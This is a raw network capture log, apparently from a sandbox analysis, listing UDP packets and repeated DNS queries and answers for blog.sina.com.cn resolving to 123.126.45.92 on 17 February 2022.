Feb 17, 2022 20:23:21.611524105 CET	53	55016	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:25.689045906 CET	64345	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:25.707355022 CET	53	64345	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:29.658852100 CET	57128	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:29.900372028 CET	53	57128	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:33.902399063 CET	54791	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:33.921515942 CET	53	54791	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:38.045717955 CET	58530	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:38.064519882 CET	53	58530	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:41.927798986 CET	53813	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:41.946727037 CET	53	53813	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:46.079430103 CET	63732	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:46.096263885 CET	53	63732	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:51.401515007 CET	57344	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:51.420788050 CET	53	57344	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:54.518117905 CET	54450	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:54.534945965 CET	53	54450	8.8.8.8	192.168.2.5
Feb 17, 2022 20:23:58.709542036 CET	59261	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:23:58.728400946 CET	53	59261	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:02.723436117 CET	57151	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:02.740253925 CET	53	57151	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:07.335109949 CET	51649	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:07.662615061 CET	53	51649	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:10.779923916 CET	65086	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:11.099441051 CET	53	65086	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:14.845992088 CET	56432	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:15.167742014 CET	53	56432	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:18.691988945 CET	52929	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:18.708914042 CET	53	52929	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:23.020622969 CET	64317	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:23.340293884 CET	53	64317	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:27.010618925 CET	61004	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:27.027789116 CET	53	61004	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:30.955777884 CET	56895	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:31.272394896 CET	53	56895	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:35.032768965 CET	61515	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:35.049979925 CET	53	61515	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:38.826637030 CET	56675	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:38.845635891 CET	53	56675	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:43.578985929 CET	57172	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:43.597493887 CET	53	57172	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:47.848172903 CET	55267	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:48.149924040 CET	53	55267	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:52.034387112 CET	54766	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:52.053261042 CET	53	54766	8.8.8.8	192.168.2.5
Feb 17, 2022 20:24:55.944036007 CET	56562	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:24:56.175182104 CET	53	56562	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:00.303634882 CET	53591	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:00.629821062 CET	53	53591	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:03.981631994 CET	56032	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:04.001549006 CET	53	56032	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:08.023474932 CET	61150	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:08.041820049 CET	53	61150	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:12.089806080 CET	63458	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:12.336373091 CET	53	63458	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:16.136531115 CET	50422	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:16.158566952 CET	53	50422	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:20.645279884 CET	53247	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:20.663877010 CET	53	53247	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:24.752823114 CET	58544	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:24.771568060 CET	53	58544	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:28.780366898 CET	53814	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:29.013144016 CET	53	53814	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:32.871998072 CET	51305	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:32.890717030 CET	53	51305	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:36.898400068 CET	53670	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:36.917221069 CET	53	53670	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:40.938633919 CET	55160	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:41.252222061 CET	53	55160	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:45.067032099 CET	61414	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:45.085952044 CET	53	61414	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:49.043972969 CET	63847	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:49.062124968 CET	53	63847	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:53.068669081 CET	61523	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:53.087526083 CET	53	61523	8.8.8.8	192.168.2.5
Feb 17, 2022 20:25:57.353576899 CET	50551	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:25:57.372282982 CET	53	50551	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:01.139997959 CET	62847	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:01.156995058 CET	53	62847	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:05.141797066 CET	57712	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:05.160805941 CET	53	57712	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:09.170309067 CET	61891	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:09.497654915 CET	53	61891	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:13.163882971 CET	61585	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:13.480824947 CET	53	61585	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:17.222548008 CET	65163	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:17.239001036 CET	53	65163	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:21.226278067 CET	58969	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:21.546710014 CET	53	58969	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:25.313520908 CET	53977	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:25.332226038 CET	53	53977	8.8.8.8	192.168.2.5
Feb 17, 2022 20:26:29.451911926 CET	57147	53	192.168.2.5	8.8.8.8
Feb 17, 2022 20:26:29.770348072 CET	53	57147	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 17, 2022 20:22:56.503609896 CET	192.168.2.5	8.8.8.8	0xe4e6	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:22:57.484842062 CET	192.168.2.5	8.8.8.8	0xc6d9	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:01.320740938 CET	192.168.2.5	8.8.8.8	0xc504	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:05.332601070 CET	192.168.2.5	8.8.8.8	0x9861	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:09.397387981 CET	192.168.2.5	8.8.8.8	0x2999	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:13.562412977 CET	192.168.2.5	8.8.8.8	0x4cb0	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:17.551609993 CET	192.168.2.5	8.8.8.8	0x801f	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:21.592600107 CET	192.168.2.5	8.8.8.8	0x1e67	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:25.689045906 CET	192.168.2.5	8.8.8.8	0x2ea1	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:29.658852100 CET	192.168.2.5	8.8.8.8	0x2d3c	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:33.902399063 CET	192.168.2.5	8.8.8.8	0x752d	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:38.045717955 CET	192.168.2.5	8.8.8.8	0xd7f3	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:41.927798986 CET	192.168.2.5	8.8.8.8	0x9745	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:46.079430103 CET	192.168.2.5	8.8.8.8	0xc79c	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:51.401515007 CET	192.168.2.5	8.8.8.8	0x252f	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:54.518117905 CET	192.168.2.5	8.8.8.8	0x3b14	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:58.709542036 CET	192.168.2.5	8.8.8.8	0xa3a8	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:02.723436117 CET	192.168.2.5	8.8.8.8	0x5654	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:07.335109949 CET	192.168.2.5	8.8.8.8	0xa64a	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:10.779923916 CET	192.168.2.5	8.8.8.8	0xaa5d	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:14.845992088 CET	192.168.2.5	8.8.8.8	0x6025	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:18.691988945 CET	192.168.2.5	8.8.8.8	0xb78b	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:23.020622969 CET	192.168.2.5	8.8.8.8	0x2ff3	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:27.010618925 CET	192.168.2.5	8.8.8.8	0x16ff	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:30.955777884 CET	192.168.2.5	8.8.8.8	0x6526	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:35.032768965 CET	192.168.2.5	8.8.8.8	0xfe78	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:38.826637030 CET	192.168.2.5	8.8.8.8	0x5770	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:43.578985929 CET	192.168.2.5	8.8.8.8	0x5bed	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:47.848172903 CET	192.168.2.5	8.8.8.8	0x16ca	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:52.034387112 CET	192.168.2.5	8.8.8.8	0x947a	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:55.944036007 CET	192.168.2.5	8.8.8.8	0x5ed3	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:00.303634882 CET	192.168.2.5	8.8.8.8	0x8392	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:03.981631994 CET	192.168.2.5	8.8.8.8	0x477e	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:08.023474932 CET	192.168.2.5	8.8.8.8	0x6de9	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:12.089806080 CET	192.168.2.5	8.8.8.8	0xb9bb	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:16.136531115 CET	192.168.2.5	8.8.8.8	0x6e69	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:20.645279884 CET	192.168.2.5	8.8.8.8	0xf332	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:24.752823114 CET	192.168.2.5	8.8.8.8	0x3223	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:28.780366898 CET	192.168.2.5	8.8.8.8	0xbb4	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:32.871998072 CET	192.168.2.5	8.8.8.8	0x51e7	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:36.898400068 CET	192.168.2.5	8.8.8.8	0x9fea	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:40.938633919 CET	192.168.2.5	8.8.8.8	0xfb3c	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:45.067032099 CET	192.168.2.5	8.8.8.8	0xed3e	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:49.043972969 CET	192.168.2.5	8.8.8.8	0x7c1	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:53.068669081 CET	192.168.2.5	8.8.8.8	0x172f	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:57.353576899 CET	192.168.2.5	8.8.8.8	0x9dd2	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:01.139997959 CET	192.168.2.5	8.8.8.8	0x1a3a	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:05.141797066 CET	192.168.2.5	8.8.8.8	0xf763	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:09.170309067 CET	192.168.2.5	8.8.8.8	0x4c4e	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:13.163882971 CET	192.168.2.5	8.8.8.8	0xaf17	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:17.222548008 CET	192.168.2.5	8.8.8.8	0x1529	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:21.226278067 CET	192.168.2.5	8.8.8.8	0xb0d7	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:25.313520908 CET	192.168.2.5	8.8.8.8	0xb869	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)
Feb 17, 2022 20:26:29.451911926 CET	192.168.2.5	8.8.8.8	0x89f8	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 17, 2022 20:22:56.820297003 CET	8.8.8.8	192.168.2.5	0xe4e6	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:22:56.820297003 CET	8.8.8.8	192.168.2.5	0xe4e6	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:22:57.803123951 CET	8.8.8.8	192.168.2.5	0xc6d9	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:22:57.803123951 CET	8.8.8.8	192.168.2.5	0xc6d9	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:01.640818119 CET	8.8.8.8	192.168.2.5	0xc504	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:01.640818119 CET	8.8.8.8	192.168.2.5	0xc504	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:05.654016018 CET	8.8.8.8	192.168.2.5	0x9861	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:05.654016018 CET	8.8.8.8	192.168.2.5	0x9861	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:09.416057110 CET	8.8.8.8	192.168.2.5	0x2999	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:09.416057110 CET	8.8.8.8	192.168.2.5	0x2999	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:13.881606102 CET	8.8.8.8	192.168.2.5	0x4cb0	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:13.881606102 CET	8.8.8.8	192.168.2.5	0x4cb0	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:17.568496943 CET	8.8.8.8	192.168.2.5	0x801f	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:17.568496943 CET	8.8.8.8	192.168.2.5	0x801f	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:21.611524105 CET	8.8.8.8	192.168.2.5	0x1e67	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:21.611524105 CET	8.8.8.8	192.168.2.5	0x1e67	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:25.707355022 CET	8.8.8.8	192.168.2.5	0x2ea1	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:25.707355022 CET	8.8.8.8	192.168.2.5	0x2ea1	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:29.900372028 CET	8.8.8.8	192.168.2.5	0x2d3c	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:29.900372028 CET	8.8.8.8	192.168.2.5	0x2d3c	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:33.921515942 CET	8.8.8.8	192.168.2.5	0x752d	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:33.921515942 CET	8.8.8.8	192.168.2.5	0x752d	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:38.064519882 CET	8.8.8.8	192.168.2.5	0xd7f3	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:38.064519882 CET	8.8.8.8	192.168.2.5	0xd7f3	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:41.946727037 CET	8.8.8.8	192.168.2.5	0x9745	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:41.946727037 CET	8.8.8.8	192.168.2.5	0x9745	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:46.096263885 CET	8.8.8.8	192.168.2.5	0xc79c	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:46.096263885 CET	8.8.8.8	192.168.2.5	0xc79c	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:51.420788050 CET	8.8.8.8	192.168.2.5	0x252f	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:51.420788050 CET	8.8.8.8	192.168.2.5	0x252f	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:54.534945965 CET	8.8.8.8	192.168.2.5	0x3b14	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:54.534945965 CET	8.8.8.8	192.168.2.5	0x3b14	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:23:58.728400946 CET	8.8.8.8	192.168.2.5	0xa3a8	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:23:58.728400946 CET	8.8.8.8	192.168.2.5	0xa3a8	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:02.740253925 CET	8.8.8.8	192.168.2.5	0x5654	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:02.740253925 CET	8.8.8.8	192.168.2.5	0x5654	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:07.662615061 CET	8.8.8.8	192.168.2.5	0xa64a	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:07.662615061 CET	8.8.8.8	192.168.2.5	0xa64a	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:11.099441051 CET	8.8.8.8	192.168.2.5	0xaa5d	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:11.099441051 CET	8.8.8.8	192.168.2.5	0xaa5d	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:15.167742014 CET	8.8.8.8	192.168.2.5	0x6025	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:15.167742014 CET	8.8.8.8	192.168.2.5	0x6025	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:18.708914042 CET	8.8.8.8	192.168.2.5	0xb78b	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:18.708914042 CET	8.8.8.8	192.168.2.5	0xb78b	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:23.340293884 CET	8.8.8.8	192.168.2.5	0x2ff3	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:23.340293884 CET	8.8.8.8	192.168.2.5	0x2ff3	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:27.027789116 CET	8.8.8.8	192.168.2.5	0x16ff	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:27.027789116 CET	8.8.8.8	192.168.2.5	0x16ff	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:31.272394896 CET	8.8.8.8	192.168.2.5	0x6526	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:31.272394896 CET	8.8.8.8	192.168.2.5	0x6526	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:35.049979925 CET	8.8.8.8	192.168.2.5	0xfe78	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:35.049979925 CET	8.8.8.8	192.168.2.5	0xfe78	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:38.845635891 CET	8.8.8.8	192.168.2.5	0x5770	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:38.845635891 CET	8.8.8.8	192.168.2.5	0x5770	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:43.597493887 CET	8.8.8.8	192.168.2.5	0x5bed	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:43.597493887 CET	8.8.8.8	192.168.2.5	0x5bed	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:48.149924040 CET	8.8.8.8	192.168.2.5	0x16ca	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:48.149924040 CET	8.8.8.8	192.168.2.5	0x16ca	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:52.053261042 CET	8.8.8.8	192.168.2.5	0x947a	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:52.053261042 CET	8.8.8.8	192.168.2.5	0x947a	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:24:56.175182104 CET	8.8.8.8	192.168.2.5	0x5ed3	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:24:56.175182104 CET	8.8.8.8	192.168.2.5	0x5ed3	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:00.629821062 CET	8.8.8.8	192.168.2.5	0x8392	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:00.629821062 CET	8.8.8.8	192.168.2.5	0x8392	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:04.001549006 CET	8.8.8.8	192.168.2.5	0x477e	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:04.001549006 CET	8.8.8.8	192.168.2.5	0x477e	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:08.041820049 CET	8.8.8.8	192.168.2.5	0x6de9	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:08.041820049 CET	8.8.8.8	192.168.2.5	0x6de9	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:12.336373091 CET	8.8.8.8	192.168.2.5	0xb9bb	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
Feb 17, 2022 20:25:12.336373091 CET	8.8.8.8	192.168.2.5	0xb9bb	No error (0)	blogx.sina.com.cn		123.126.45.92	A (IP address)	IN (0x0001)
Feb 17, 2022 20:25:16.158566952 CET	8.8.8.8	192.168.2.5	0x6e69	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)
